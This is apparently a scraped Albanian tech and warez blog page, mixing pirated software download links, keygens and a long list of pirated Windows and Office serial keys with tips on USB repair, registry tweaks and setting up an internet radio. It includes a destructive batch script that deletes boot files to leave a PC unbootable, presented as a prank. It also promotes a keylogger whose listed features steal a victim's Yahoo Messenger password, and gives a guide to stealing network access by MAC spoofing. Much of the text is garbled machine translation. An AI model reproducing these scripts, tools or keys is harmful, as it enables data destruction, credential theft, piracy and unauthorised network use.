Informatika Shqiptare              

Kaspersky Virus Removal Tool 2010 9.0.0.722 [15.05.2010]

Picture
Kaspersky Virus Removal Tool 9.0.0.722 2010 [2010/5/15] | 68.8MB

Kaspersky Virus Removal Tool Përshkrimi
Një tjetër virus scanner software dhe zbulimin nga Kaspersky.

Virus Kaspersky Removal Tool aplikim është projektuar të jetë një tjetër skaner virusdhe software zbulimin nga Kaspersky. produst do të hetoj lokacionet specifikuara përçdo kërcënimet e virusit dhe largimin e tyre ose dërgoni  dosje kasaforta.
Ugotfile Link:


Download
http://ugotfile.com/file/1382438/setup_9.0.0.722_15.05.2010_09-29.exe


Xbox_360_Emulator_v3.0

Picture
Xbox 360 Emulator 3,0

kontrolluesit Kjo emulates pak Ministrisë së Mbrojtjes nuk-XInput mënyrë që ata të funksionojë si kontrollues Xbox360 në PC.
XBOX 360 Controller emulator v3.0 për lojra PC duke përdorur XInput.
Ky program do të shtojë më shumë mbështetje kontrollues për Lojrat për Windows.

Shënime:
Testuar me Logitech Cordless Rumblepad 2 dhe Logitech G25 Racing Wheel.
Testuar me pas PC Games
Juiced 2: hin
Crysis mbushjen
GTAIV
GRID
MotoGP 08
Club
Kane dhe Lynch
Sega Rally
Bionic Commando
Web Spiderman e Hijet
Unreal Tournament 3
Shadowrun
Grindja 3
Flatout 2 Carnage Ultimate
dhe e re
Zoti i pushtimit Rings
Mirror's Edge (me disa bugs hartës)

Ajo nuk është duke punuar me
Gears of War
007 Quantum of Solace

Etj XInput mund të shkojnë nga disa emra, ju mund të riemërtoni etj me ato më poshtë derisa ju të gjeni një që punon
xinput9_1_0.dll
xinput1_3.dll
xinput1_2.dll
xinput1_1.dll

GTAIV përdor xinput9_1_0.dll
GTAIV v1.1 info:
Përdorim të përfshira dinput8.dll


Shikoni xbox360cemu.ini të përfshira për ndihmë config

Instalimi:
xinput1_3.dll Ekstrakt, file xbox360cemu.ini në dosjen exe lojë.
Rename DLL nëse është e nevojshme
file Ekstrakt dinput8.dll në dosjen exe lojë nëse doni të fshehur kontrollues tuaj nga loja.
** Nuk e zëvendëson fotografi sistem **

Çinstalimit:
xbox360cemu.ini Delete, file xinput1_3.dll.

Perdorimi:
Kur fillon loja ju duhet të dëgjoni një bip nga Gjuha e kompjuterit tuaj.
Në qoftë se ju nuk keni një drejtues PC ju nuk mund të dëgjojnë bip, por ajo do të vazhdojnë të punojnë.
Luajnë lojë si normale.


112??? 9
Përmirësime të mëdha për Feedback Force (me default settings)
Added Fade In / Out për Force dridhje Feedback
Efekt Added Pranvera për rrota Feedback Force
Efekt Added Inertia për rrota Feedback Force
Added ndryshueshme UseAutoPad (automatikisht të bëjë ndonjë jastëk PAD1 pas zbulimin e lëvizjes)
Added ndryshueshme UseInitBeep
Added shumë opsione të reja Force Feedback
Added aftësinë për të slider hartë të Left / Right shkaktojë
Added aftësinë për butonat hartë të boshtit Analog
Added Non-Linear rregullime në aksin Analog
Komentet Added të reja për të përfshirë ini file
F9 Added hotkey të rifreskoni config file dhe reinit
Fixed bug me kontrollues zbulimin Feedback jo Force
Fixed bug me swapped Left / Right shkaktojë
Fixed bugs më shumë dalje etj?
Fixed një aks slider hartë bug?
ndryshime të vogla për të XInput Test Utility

19??? 9
Më shumë Imrovements për Feedback Force (hequr një flamur fillim)
DLL tani del siç duhet
Rezoluta më e lartë aks

18??? 9
Added support for 4 kontrolluesit PAD1 të PAD4
Përmirësuar Support Force komentet (Infinit kohë efekt)
Added ndryshueshme ForceFeedbackStrength (default 100, përdorimi 0-999)
Added ndryshueshme Indeksi për indeksin e kontrollues (-1 për të përdorur disable)
Added Crysis mbështetje mbushjen (shtuar packetnumber)
Added Test Utility (përdor xinput1_3.dll)
Added SteeringWheel ndryshueshme (kjo do të rregullojmë efekte feedback fuqi për rrota)
Added aftësia për të çaktivizuar një aks (boshti i vendosur për 7)

128??? 8
Added Support Force komentet (add UseForceFeedback = 1 to file xbox360cemu.ini)
Vendndodhja Changed INI

 
Code:http://hotfile.com/dl/30776424/361f7ba/Xbox.rar.html


PC Tools Internet Security

Picture
PC Tools Internet Security kombinon teknologjive të vlerësuar me çmime të sigurisënga PC Tools, duke përfshirë Spyware Doctor AntiSpyware, antivirus, Firewall Plusdhe mbrojtjen Spam, për të siguruar mbrojtjen e plotë të integruar për PC tuaj.
PC Tools Internet Security Suite 2009 siguron mbrojtje kundër: Spyware, Adware,Trojans, Viruses, Worms, keyloggers, vjedhjet e identitetit, rrëmbyesit, Ndjekja Kërcënimet, Rogue Anti-Spyware, pa dashje Software, Phishing, Popups, Kosova dheBad Websites

Download: 40MB 
Code:
http://hotfile.com/dl/21789308/03f302c/1648PCTIS.rar.html.

Adobe Dreamweaver + Keygen5

Picture
Adobe ® Dreamweaver ® software CS5 fuqizon designers dhe zhvilluesve për të ndërtuar faqet e internetit të bazuar në standarde me besim. Design shikimi osedrejtpërdrejt  kod, të zhvillojnë faqet me sistemet e menaxhimit të përmbajtjes, dheme saktësi test në sajë compatibility shfletuesin për integrim me Adobe BrowserLab,një i ri Adobe CS shërbim Live online .* CS shërbimet Live plotësojnë për një kohë të kufizuar

Design faqen tuaj Vizualisht
Merrni një kërcim  krijimin e faqeve të bazuar në standarde web me updated faqet e CSS-bazë starter. Aktivizo Inspect CSS  Live Shiko dhe shkulje dizajnit tuaj me sy  marrë vetëm diferencë të drejtë dhe mbushje.

SIGURUAR CROSS-BROWSER PAJTUESHMËRIA
Test faqet tuaja  Adobe BrowserLab  shfletues të shumta dhe të sistemeveoperative. Krahaso pikëpamjet browser solo, krah-për krah, ose qepë-skinned në majë të njëra-tjetrën për matching pixel-e saktë


                                                                 .:::: DOWNLOAD::::.
http://www.fileserve.com/file/GSW28bz/ADBE_DWCS5.part1.rar
http://www.fileserve.com/file/dX99qap/ADBE_DWCS5.part2.rar
http://www.fileserve.com/file/9PGtRdT/ADBE_DWCS5.part3.rar
http://www.fileserve.com/file/hWM7rCe/ADBE_CS5_MasterKeygen.rarFshih Dosjet Ne Foto

ne kete tutorial do tju tregoj se si ti fshehim dosjet tona file apo ndonje gje ne nje fotografi te formatit "jpg". Per te gjith te apasionuarit shikoni si ta beni. Duhet te kemi si software "winRar" e natyrisht nje fotografi jpg qe mund te krojoni me njeher ne Paint. Ja fillojm duke futur documentin apo dosjen tone ne nje arkiv rar. Celom CMD duke shkuar keshtu Start-> Run -> dhe e shkruam cmd dhe enter. Ne skemen e prorompt japim kete komand te thjesht: copy /b “C:emri_file.jpg” + “C:emri_file.rar” “C:file_i_ri.jpg” Do te thot nese eshte arkivi per ta mshefur img qe duhet te mbaj dosjen, gjinden ne c: file_i_ri.jpg qe mund te visualizohet normalisht si cfare do fotografije tjeter. Per ta vizualixuar dosjen tjeter ju mjafton te ndrroni emrin prej jpg ne rar, ose me nje software falas "rinominer.exe"

Problemet e USB

A jeni ballafaquar me ndonje problem me USB tuaj?
Nëse përgjigja është po, ju nuk jeni vetëm. Ka me miliona përdorues të USB-ve te cilet hasin çdo dite probleme te ndryshme.
Kohen e fundit jane bere problemi aktual keshtu qe unë vendosa te i
koleksionoj te gjitha me nje teme se bashku me zgjidhjet keshtu qe antaret te orientohen ketu kur hasin ndonje problem perparase te pyesin.

1. Kompjuteri nuk detekton kyqjen e USB 

Ky problem shkaktohet per shkak te problemeve qe posedon ne regjistrin e kompjuterit. 

Per te zgjidhur nje problematikë te tille ndiq udhezimet e meposhtme:
Metoda e parë: 

Kliko Mbi My computer me tast djatht > Manage
Zgjedh Storage
Zgjidh Disk Management
Zgjedh Usb-ën tuaj
Kliko me tast djatht ”Change drive letter and paths“
Pastaj e ke Assign the following the drive leter
Ndrysho emrin e Usb psh prej F në S ose X
Metoda e dytë: 

Kliko Start -> Run, shkruaj REGEDIT -> OK
Gjej lokacionin:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E980-E325-11CE-BFC1-08002BE10318}
Selekto UpperFilters , shtyp Delete, pastaj Yes.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E967-E325-11CE-BFC1-08002BE10318}
Selekto LowerFilters , shtyp Delete, pastaj Yes.
Mbyll dritaren punuese
Restarto kompjuterin dhe shiko efektin

2. Problem në ndaljen e USB

Kur deshironi te ndaloni punen e USB me ane te opcionit “Safely Remove Hardware”, ju shfaq errorin “Generic volume can not be stopped right now”. Ndalja ne menyre jo të rregullt mund ta demtojë USBtuaj. 

Per te zgjidhur nje problematikë te tille ndiq udhezimet e meposhtme: 

Shkarko Unlocker dhe instalo ne kompjuter.
Kliko me tastin e djathte mbi USB dhe selekto Unlocker.

Nje dritare tjeter do hapet, aty kliko butonin Unlock All si ne foton e meposhtme.

Pasi te klikojsh Unlock All provo te ndalesh USB ne menyre normale, nepermjet opcionit “Safely Remove Hardware”.
Nese prape nuk je ne gjendje te ndalesh ne menyre te rregullt, kliko butonin Kill Process në Unlocker.
Shënim: Nese njera nga opcionet nuk funksionon atehere mundesia e fundit eshte te fikësh kompjuterin dhe ta nxjerresh USB nga porta e saj. 

3. Kompjuteri detekton USB , por nuk e shfaq ikonen në My Computer
Ky problem shfaqet kur kompjuteri njef USB si pajisje te jashtme mirepo nuk esht ene gjendje qe ne menyre virtuale ta shfaq ate . 

Per te zgjidhur nje problematikë te tille ndiq udhezimet e meposhtme:
Vendos USB ne kompjuter

Kliko Mbi My computer me tast djatht > Manage
Zgjedh Storage
Zgjidh Disk Management
Zgjedh Usb-ën tuaj
Kliko me tast djatht ”Change drive letter and paths“
Pastaj e ke Assign the following the drive leter

Ndrysho emrin e Usb psh prej F në S ose X

Disa Seriale Per Windows Dhe Disa Per Progrme

WINDOWS 2000 PRO BR
Serial: R7FJF-4CFD4-98268-FF92P-J9V4G

WINDOWS 2003 SERVER
M6RJ9-TBJH3-9DDXM-4VX9Q-K8M8M
...JB88F-WT2Q3-DPXTT-Y8GHG-7YYQY
QW32K-48T2T-3D2PJ-DXBWY-C6WRJ

WINDOWS 2003 WEB SERVER:
d42×8-7mwxd-m4b76-mkyp7-cw9fd

WINDOWS 98 SE BR
XJ3XX-YR4CJ-TQD6J-76QJR-GJMJB

WINDOWS MILLENNIUM EDITION FULL BR
Q7JRD-HH6DG-RD4BK-H93DF-DQ4FG

WINDOWS XP PRO BR
FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8

lanjut kebawah

WINDOWS XP CORPORATE
FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8

WINDOWS XP PRO FINAL DESBLOQUEADO EM INGLES
SERIAL: FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8

WindowsXP Professional,
QW4HD-DQCRG-HM64M-6GJRK-8K83T (works)
PQTHM-RWBHR-3BPVW-TFB22-V8HXQ (works)
KQC2B-X683R-2CDXT-PQ7HQ-47MPT (works)
JFQYM-YJQFQ-VBRCY-4VV7W-QRXBY (works)
KMTTB-68H32-8MKRK-GBHKT-RKCP6 (works)
CX7DD-4GX4Y-BTTR4-H88Y7-GQPWQ (works)
XP8BF-F8HPF-PY6BX-K24PJ-TWT6M (works)
8RCKG-36TH8-VWBGK-T3CB6-RHG48 (works)
7G4H4-T4XXW-BVXTH-4QP4V-9CV28 (works)
PG274-383QX-6C32H-P8RWC-48M4Q (works)
CWY3F-JGYHJ-W6KBG-3VYK7-DGG7M (works)
X6YWJ-M4TG2-DPGWJ-QCFR8-927M6 (works)
QCP6D-7VGVJ-JBKB4-DQMB2-9GTJ3 (works)
F7GV4-B7JGY-Q2KQW-6R8BM-FR8D6 (works)
HFVK4-TFWFG-4JKDH-H3FTT-8B23W (works)
HRPR7-WGJFC-VPHRB-XVFRW-2KPWY (works)
V3V63-3QW2G-JMFBY-8F4CM-PDMQW (works)
WX736-8YJCM-2JW33-4KJGY-XCDJ6 (works)
CQKYH-GKDJC-MJTWP-FPTJX-PKK23 (works)
CHYVW-V63RT-67XVC-XJ4VC-M3YWD (works)
XMDCV-2TJMR-7JD66-YTVMK-V7PBD (works)
RQHFJ-X47QJ-G2XKK-WYQ8P-7W6RG (works)
X6MYY-6BH3T-YRBT8-H8YPH-RG68T (works)
KVXQ3-RVQFG-FW8KC-2QYC6-67WCD (works)
KMM7J-FCXMM-WV8PG-6FQMD-CPTQD (works)
D6T24-3FBGM-WTDG8-6Y3WP-77QRJ (works)
V88FQ-MFFRR-8D2VY-PG87J-FG7PY (works)
XK39D-3PDMC-JMMDK-X8T8M-77YVM (works)
6G3J7-RQ233-FJGHD-GKYP4-QGKPG (works)
BKRFY-XPMQP-Y8PTW-BP6JM-B76FJ (works)
GP7DR-2T2CQ-JYW2M-DXTMG-DTQWY (works)
YWVHF-GT3M6-3QYB2-FCYCH-X47PQ (works)
QJ68H-G7T8R-WFR77-D8X8Y-VJ398 (works)
6KYDY-JT4MB-6V3JQ-4KKFG-P6C63 (works)
6JQPJ-84CFG-JCBQP-PVRJP-9G24Q (works)
MQ8JV-XXKVG-DB8V3-67WJB-RCB6W (works)
J3T66-JTP72-TGT7H-PMMWH-XM4K3 (works)
DB4H8-DQJJB-KXMWP-GPJVY-H7P6W (works)
38BXC-F2C4R-PXMXV-DBQXM-3C7V6 (works)
7FMM3-W4FMP-4WRXX-BKDRT-7HG48 (works)

Microsoft Office 2007
key: KGFVY-7733B-8WCK9-KTG64-BC7D8
key: TT3M8-H3469-V89G6-8FWK7-D3Q9Q

WINDVD 4.55 PLATINUM
8RXBCYECMOZZQ8B

WINOCD 3.7 POWER EDITION
Serial: 01833-24387617j

WORDPERFECT OFFICE 2000 VOICE POWERD EDITION
W9DNR-7939923421 XARA MENU MAKER V1.0
SERIAL : XMM-931431084595

XARA WEBSTYLE V3.0
SERIAL: 912565269169

XP HOME
SERIAL PW4V4-VFGC6-Y2BF4-DR2RD-HXC49

XP SP-3 Update Juli 2007
SERIAL XP8BF – F8HPF – PY6BX – K24PJ – TWT6M

XP SP-1 2003
SERIAL FCKGW – RHQQ2 – YXRKT – 8TG6W – 2B7Q8

Office XP 2007
SERIAL KGFVY – 7733B – 8WCK9 -KTG64 – BC7D8

microsoft microsoft office xp exel xp
S/N: 2777P-JW32P-6HHGW-77Q8Q-FV2TC

EA Battelfield 2142 3.2
S/N: DYTB-8YKD-27KF-SV42-8MXT

Microsoft Microsoft Office Visio 2007 Professional 2007
S/N: HCFPT-K86VV-DCKH3-87CCR-FM6HW

McFunSoft Inc Video Convert Split Merge Studio 6.8.2 Build 567
S/N: Name : Sezgin Mutlu
Organization: Turkey
Serial : VCSMS5947428

Ahead Nero 7.7.5.1
S/N: 1C80-0014-19E5-MA2X-4003-92CA-K29M

Nero 7
S/N: 6556C53534535N53535

Adobe Macromedia DreamWeaver MX 4.0.100.1190
S/N: DWW600-54622-26755-01760

Adobe Macromedia Fireworks MX 6.0.0.273
S/N: FWW600-04860-63582-21175

NetObjects Net Objects Fusion 10
S/N: NFG-1000-R-353-00628-34282

Hooalsd Kinoma 4.0
S/N: 090035

Valts Silaputnins Proxy Switcher Pro 3.9.0 Build 4059
S/N: Name: Sezgin Mutlu
Code:VMTV2-5AXHQ-UNPHO-AN11Y-NP2XI

Brasfoot Brasfoot 2007 Name: Paulo Barbosa da Silva Junior
S/N: 207799350

Avenue Productions GmbH Web Jewel FX, Version 1.1 S/N: Maschinen-Code: VPRNGEMETCQKCNM
Passender Freischalt-Code:
WVBNAPWXLJNEHYSUDXOG4564

Microsoft(R) MS Office Project Professional 2007 12.0.4518.1014 S/N: BHFYK-9RTKR-RV3J6-X669J-XQ3Q8

EA Need for Speed Carbon 1.0 S/N: DPQY-KFG5-GBQ9-9T27-QQGD | TWSA-5699-LZVM-KQS2-F9EL | QEFP-MA2W-MNL8-DKES-KY2C | 3WBB-HGFK-4CCH-C5MD-XEXW

PC Tools Registry Mechanic 6.0.0.780 Name: Kim Weems
S/N: Kim Weems
62EB-03BE-C359-CAFE-8BC7-C252-678D-EA8C

Microsoft microsoft word 2000 2000 S/N: CN-122-406-552-789-4456

Rony Cyberlink.PowerDVD.Ultra 7.2 S/N: DXNHF-B6XT7-P7BVG-75MBJ-GUGXE-G3E9A

Ashampoo Burning Studio 6 Ashampoo Burning Studio 6 6 S/N: BRS6A8-770PA5-D4C671 or

BRS645-778563-157908 or

BRS6CD-77EEB8-3AAE92 or

BRS674-776A80-CCB133 or

BRS67E-77464D-EEDFD8

THQ STalker 1.0 S/N: FK47-S4JT-576Q-GZTM

cadsys Winzip 11.0 S/N: -Name: MasterKiller – -Serial: N1HH7-1JA6U-442PG-9QE7D-XF47F-WDL9N -

Microsoft Microsoft Office 2007 enterprise german 2007 S/N: KGFVY-7733B-8WCK9-KTG64-BC7D8

Firetrust Mailwasher Pro 5.3 S/N: MTI4Oj9Sw9ZJQ2nY0BppZ4XYnfq6lI+APqSvqvj+AC1H0HEY5CJJZm7ESlpMsEXM0If2SyqCFsWR4W8w2rK0nrBgIWVAXAPo1xmV+BjF1VdZYnfrklm6h788lvJLHqkVW2ilEFdEQA9xeD9ovQAR0SXyZxoFFcpnZMF9m8oJc7mOlURVOzk6c3RydWN0dmVyOzE6MTs2Om8tc2FsdDs4OjI4ZDU1YWRkOzQ6bmFtZTsxNTpQYXVsIEVzY2hiYWN

Firetrust Mailwasher 5.3 S/N: MTI4Oj9Sw9ZJQ2nY0BppZ4XYnfq6lI+APqSvqvj+AC1H0HEY5CJJZm7ESlpMsEXM0If2SyqCFsWR4W8w2rK0nrBgIWVAXAPo1xmV+BjF1VdZYnfrklm6h788lvJLHqkVW2ilEFdEQA9xeD9ovQAR0SXyZxoFFcpnZMF9m8oJc7mOlURVOzk6c3RydWN0dmVyOzE6MTs2Om8tc2FsdDs4OjI4ZDU1YWRkOzQ6bmFtZTsxNTpQYXVsIEVzY2hiYWN

Grisoft AVG 7.5Internet Security Serial Feb 2007 7.5 S/N: 75I-TH1R11-P06-C01-S2AL7G-DP7-5RFV

Uploaded Name:gisoft !! Real name is Grisoft, very sorry for wrong typing Gubben
Grisoft AVG 7.5Internet Security Serial Feb 2007 7.5 Name: Internet Security Serial Feb 2007
S/N: 75I-TH1R11-P06-C01-S2AL7G-DP7-5RFV

UniBlue SpeedUpMy3.0 S/N: 00XHEH-M5TY2P-QEZJWB-V8UUHN

http://www.liutilities.com/products/campaigns/ppc/sp/gog/?engine=adwords%217175&keyword=%28speedupmypc%29&match_type&gclid=CI75m7fqmIsCFRPdPgodSQuIDQ Roxio Toast Titanium 80.1 S/N: 00-6Y7LN-B90U8-908RV

Ahead Nero 7.8.5.0 S/N: 1C82-0000-19E5-MAAX-4002-2881-KM22

Cyberlink Power DVD 7 S/N: RQRMN-CS8GT-AHKQX-Q5QW4-NQMWE-H2RLU

TuneUp TuneUp 2007 2007 S/N: Name: smmovi
Corparation/Firma: smmovi
FE6NK-1WGD7-2BY9L-G6EUP-TRK82-ESSXU

THCQ Supreme Commander 1.0 S/N: SR9H-WXZb-DR6X-C4GS-X1VB

On the GO Soft Passport Photo 1.5.2_nt_5 Name:http://www.onthegosoft.com/pp_download.htm
S/N: PB2fe5c429

EA Command And Conquer 3 Tiberium Wars Kane Edition 1.0 S/N: QX5M-85R6-V1B1-J2M2-1911/

 Ndryshim Propertis te Computerit

Hapni notepad dhe shkruani kodin e meposhtem:[General]Manufacturer=Vendos Emrin tend[Support Information]... Shiko më shumë
Line1=Vendos Emrin tend
Line2=Vendos ADresen tende
Line3=Vendos Emalin tend 

Dhe ruajeni si OEMINFO.INI ne C:WINDOWSsystem32.
Me pas gjeni nje foto, ose krijojeni foton ne formatin *.bmp dhe ruajeni ate ne folderin e system32 si oemlogo.bmp!
Madhesia e fotos duhet te jete 180 x 120 pixel.
Klikoni me te djathten ne My Computer dhe do te shihni ndryshimet.

Nese gjeni nje file tjeter me te tilla parametra (emer, madhesi) ne PC tuaj, tek System32, keshtu asaj ndryshojini emrin :
vendosini ndonje 1 ose shkronje tjeter nga pasWeb Per Convertime te Ndryshme Online

Shikoni New Yourk Live

Shikoni New York - un Live ne Interent !!Shikojeni New York Live nga InternetiKa Pengesa ( Bllokon ) kapaK por verehen njerzi-T dhe Auto-Ti Keni 12 kamera Live Ne te gjitha vendet me te BukuraMendoi se me i shiku po duket shum interesanT , pothuajse ti je ne New YorK  Ja DirekT LinK 

http://www.earthcam.com/usa/newyork/timessquare/index.php?cam=46hd&cam_type=large

Fik Pc Pergjithmone 

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini


Open up notepad and copy and paste that. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun ...

REMEMBER - DO NOT CLICK THIS FILE.Xilisoft iPhone Transfer v2.1.43.0331 | 9 Mb

Xilisoft iPhone Transfer is a powerful iPhone transfer software. It offers iPhone to PC transfer of music, photo, video, movie, podcast and TV program. Moreover, iPhone to iTunes, and PC to iPhone transfer are also supported. All formats compatible with iPhone are supported. These functions make it much easier to manage your iPhone.

Download:
Code:http://rapidshare.com/files/401954067/Xilisoft.iPhone.Transfer.v2.1.43.0331_CW.rar

Mirror:1
Code:http://sharingmatrix.com/file/9224935/Xilisoft.iPhone.Transfer.v2.1.43.0331_CW.rar

Mirror 2:
Code:http://www.fileserve.com/file/rGgUdm5

 Shkarko mp3 Nga YouTube

Si Te Instalojme Ne Gjuhen Shqipe PHPBB Forume

Se pari shkojm web-sitin tend ku e ke futur forumin shkon te dosja /Forum/ a qysh e ke dhe te folderi language e mer ketu http://www.phpbb.com/downloads.php language albanian e ke aty edhe e kur ta download e nxjerr zipit folderin albanian dhe fut ne ftp tendin te folderi laguages ku e thahe edhe me par edhe pastoj shko hyn ne forum ne control panel te forumit tend shko configuration edhe aty posht e len gjuhen albanian edhe kliko sumbit dhe kryhet edhe duhet te shkosh edhe te profili yt shko te profil edhe aty posht e len gjuhen shqipe

3 Milone Licensa

MyLanViewer v3.4.9 Cracked

Quote:
MyLanViewer is a powerful network scanner and IP monitor for your home network. It displays your network computers in an easy to read, buddy-list style window that provides the machine names, IP addresses, MAC addresses, shared resources and other technical details for each computer. It is able to monitor IP and show notifications when the states of some computers change. You can also view and access shared folders, terminate user sessions and disable shared resources. It?s easy to install and use, and has a user-friendly and beautiful interface.

DOWNLOAD:

Code:
http://hotfile.com/dl/36221213/d18b86c/My.Lan.Viewer.3.4.9.rar.html

Visual Basic

Digital Keylogger v3.0

Get keylog Automat: You set how fast to recive the keylog from server. - Get keylog Manual: Click "Get Keylog" to get the keylog from server. - Close Y! : You will close victim's Yahoo! Messenger, the victim will login, and you will get his password. Server will disable "Remember ID & Password" and "Auto-Login" options if they are activated. - Kill Server: The server will be deleted from victim's pc. - Send Message: You can send a message to your victim. Message type will be critical, the title will be "Microsoft Windows". - Use Backspace: If you select Yes, if your victim press Backspace button, it will keylog your to have an effect. It will delete a char from keylog. If you select No, Backsapce Pressing button, will not has any effect. - Save Log: You can save the keylog to your PC. - System Tray: The client will move to the System Tray, behind the clock. Just move the mouse over his icon to restore it. http://www.mediafire.com/?mjyc0ijzij2  --> Kujdes MUnd Te Mbahe Virus

Playstation 2 Emulator 2.09.06 PS2 BiOS

Rrit Shpejtesi e Internetit 20%

Së pari e hapim komanderin "RUN",pasi që të hapet shkruani "gpedit.msc" pa thonjëza. Zgjedhim: Local Computer Policy pastaj Administrative Templates , Network , QoS Packet Scheduler dhe në fund Limit reservable bandwid Pasi që të klikoni tek Limit reservable bandwidth hapet kjo dritare : Kliko Enabled , tash Bandwidth limit(%) ndryshoje nga 20 në 0. Dhe në fund kliko Apply dhe OK

Disa  Adresa Per Te Pare Filma

Anti-Viruse

Si Te Ndryshojme IP

1. klikojme te "Start"
02. klikojme "Run"
03. shkruajme "command" dhe enter ose ok
04. na shfaqet nje tabele e MSDOS prompt
05. shkruani fjalen ne kllapa (ipconfig /release) dhe enter
06. shkruani exit dhe ok
07. klikoni me te djathten ne "Network Places" ose "My Network Places"
08. klikoni properties
09. klikoni me te djathten tek "Local Area Connection" dhe me pas klikoni "properties"
10. Dy-here klik ne "Internet Protocol (TCP/IP)" dhe zgjidhni "General"
11. klikoni tek "Use the following IP address" under the "General"
12. krijoni nje adrese IP te re .
13. shtypni butoni -tab- dhe "Subnet Mask" do te plotesohet automatikisht.
14. klikoni "Ok"
15. perseri klikoni "Ok"
(ju shfaqe perseri tabela e "Local Area Connection")
15. Klikoni m ete djathten ne "Local Area Connection" dhe shkoni perseri Properties.
16. klikoni tek "TCP/IP" opsionet
17. kete here klikoni "Obtain an IP address automatically"
19. klikoni ok dhe perseri klikoni ok
20. Tani IP juaj u ndryshua

Si Te Vjedhim Linje Interneti

Ktu do te ju tregoj se si te vjedhni rrjet nese e keni Mac adresss Disable ne Router ...
www.malihacker.tk
1) Program per scann ( Agry Ip Scanner )
Shkarko kete
http://garr.dl.sourceforge.net/sourc.../ipscan221.exewww.malihacker.tk
Tani. skenoni rrjetin Lan ( local area connection )
dhe aty do te ju shfaqen Ip te cilat jan online qe shfrytzojn rrjet
dhe zgjidhni nje me tastin e djathtt ja boni show Mac adress e kopjoni ate dhe shkoni keshtu
www.malihacker.tk
My Network places Properties / Local area Connection Properties / Tani tek configure / Advanced / Network Adress / Vendose tick tek value.

Si Te Bejme Radio

Te nevoitet me pas WindowsXP ProfesionaL dhe normal e dini qe duhet me pas qasje 24 ore ne INT-ernational NET-work (INTER-NET)

po ashtu duhet ta instaloni (IIS Services)

Instalimi i IIS behet ne kete menyre:
Shko Start -> Control Panel -> Add/Remove Programs ->ne fund Add/Remove Windows Components

Pastaj shkon ku shkruan Internet Information Services dhe klikoni Details
dhe zgjedhe World Wide Web Service pastaj kliko OK dhe prit deri sa te instalohet Kujdes: CD-ne e Windows XP Professional duhet ta keni ne CD room

Duhet me pas IP statike po ashtu Winampin te instaluar

Pastaj beje download ShoutCast Server-in ketu :http://www.shoutcast.com/download/serve.phtml dhe pastaj instaloe

Pastaj beje Download ShoutCast DJ DSP :http://www.shoutcast.com/download/broadcast.phtml dhe pastaj instaloe

Pastaj ne kete menyre beje konfigurimin e Shout Cast Serverit:

Hape->My Computer pastaj-> Local Disck C: pastaj -> Program Files -> kerkoe Shoutcast >sc_serv.ini

pasi ta gjejsh sc_serv.ini hape me notepad

Shiko ne Notepad dhe gjeje ku shkruan maxuser=32 kete numer 32 beje 100

pastaj shiko ku shkruan password=changeme, kete changeme ndryshoe por mos e harro se pastaj me vone na kerkohet

Po ashtu gjeje ku shkruan portbase=8000 numrin 8000 ndryshoe dhe beje 8015

Tani beje "Save" dhe mbylli te gjitha windows dritaret

Pastaj vepro keshtu:

Shko -> Start -> Programs -> Shoutcast Dnas -> Shoutcast Dnas (console) kete e len te hapur po ashtu shko tek Winamp-i kliko me klik djathtë diku lart

tani shko tek Options-> Preferences dhe hapet nje dritare

Pastaj shko tek : Dsp/Effect -> Nullsoft Shoutcast Source dsp v1.8.2b [dsp_sc.dll]

Pastaj do hapet 1 dritare tjeter ku shkruan "Shoutcast Source"

pastaj shiko gjeje apo shko tek "OUTPUT":

posht shkruan "address" dhe aty e shenoni IP tuaj statike qe e keni

tek "PORT" e shkruani 8015 poashtu tek "Password" shkruje passwordin qe e ke dhene me lart tek sc_serv.ini

pastaj te "ENCODER" zgjedhe " 1 " poashtu tek "RECONNECTION TIMEOUT" shkruaje 0

Pastaj shko ne "yellowpages" dhe shkruaj diçka qka te deshiron p sh ix & nixer

Pastaj Shko tek butoni tjeter "ENCODER": dhe tani tek "ENCODER TYPE" zgjedhe mp3 encoder

Gjithashtu shko tek "ENCODER SEETINGS" clickoe 24kbps 22.050khz mono

Pastaj shko tek INPUT: ( kjo na lejon qe te zgjedhim qe a duam te leshojm muzik nga Sound Card apo nga Winamp-i dhe e zgjedh se cilen deshiron

Pastaj kthehemi prap tek butoni "OUTPUT" dhe klikojm "CONNECT"

Dhe pastaj normal e dini qe duhet me di IP tuaj statike qe e ke dhene si dhe Passwordin

Kjo eshte nje nga format e krijimit te nje Radio Online..

Si Te Shpejtojme Hard Diskun

Kjo ështe Shume e thjesht dhe Funksiunuese 
Si te perforcosh Një external hard drive

1.Shko My Computer >>Manage 
2.Kliko në Device Manager 
3.Hap Disk Drives Dhe Gjeje Vendodhjen e External Drive ne List 
4.Kliko me Tast Djatht Dhe Zgjedhe Properties 
5.Shko Në Policies tab Dhe Zgjidhe Optimize for performance
6.Pastaj,Aktivizoje (enable) Piken Write caching dhe advanced performance
.

Rrit Shpejtesine e U-Torrent

Praktikisht do te evitojme qe XP te perdore file-n Swap ne vend te RAM-it.
procedoni Start->RUN->regedit dhe gjeni celsin HKEY_LOCAL_MACHINESYSTEM CurrentControlSetContro lSession ManagerMemory Managementtani ne DisablePagingExecutive vini 1 (per default eshte 0)

Zgjidhja e Problemeve Te USB

A jeni ballafaquar me ndonje problem me USB tuaj?
Nëse përgjigja është po, ju nuk jeni vetëm. Ka me miliona përdorues të USB-ve te cilet hasin çdo dite probleme te ndryshme.
Kohen e fundit jane bere problemi aktual keshtu qe unë vendosa te i koleksionoj te gjitha me nje teme se bashku me zgjidhjet keshtu qe antaret te orientohen ketu kur hasin ndonje problem perparase te pyesin.

1. Kompjuteri nuk detekton kyqjen e USB 


Ky problem shkaktohet per shkak te problemeve qe posedon ne regjistrin e kompjuterit. 

Per te zgjidhur nje problematikë te tille ndiq udhezimet e meposhtme:
Metoda e parë: 

Kliko Mbi My computer me tast djatht > Manage
Zgjedh Storage
Zgjidh Disk Management
Zgjedh Usb-ën tuaj
Kliko me tast djatht ”Change drive letter and paths“
Pastaj e ke Assign the following the drive leter
Ndrysho emrin e Usb psh prej F në S ose X
Metoda e dytë: 

